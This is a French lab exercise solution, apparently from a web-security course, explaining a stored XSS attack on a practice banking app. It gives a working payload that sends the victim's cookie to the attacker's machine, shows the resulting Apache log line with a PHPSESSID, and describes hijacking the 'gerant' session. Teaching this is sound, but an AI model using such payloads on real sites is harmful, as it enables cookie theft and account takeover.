6.6: Correction:

Voici ce qu'on peut taper dans le formulaire de message:

<img id="imagexss" src="http://192.168.xx.xx/"/><script>document.getElementById("imagexss").src+=document.cookie;</script>

Une image est crée et le cookie est ajouté par le JS à la fin du src.

Quand "gerant" visite sa page, ce JS est exécuté.

Ensuite sur votre machine (192.168.xx.xx) vous pouvez taper :

tail /var/log/apache2/access.log
Vous devez voir une ligne du type:

192.168.yy.yy - - [04/Mar/2015:10:01:40 +0100] "GET /PHPSESSID=c76ip7c1thg4u1e5mtt8fulma0 HTTP/1.1" 404 523 "http://192.168.yy.yy/banque/index.php" "Mozilla/5.0 (X11; Debian; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
Il ne vous reste plus qu'à copier le cookie dans la console de votre navigateur pour prendre le contrôle de la session de "gerant".
Ouf.

Conseil: si vous faites plusieurs essais, remplacez à chaque "imagexss" par autre chose aux 2 endroits où elle apparaît dans le message.  Par exemple, vous pouvez remplacer par  "imagexss2", "imagexss3", "imagexss4", etc.

C'est compliqué... mais vous n'avez pas besoin de retenir tout ca.
L'important est de comprendre le principe de base du XSS, qui est assez simple.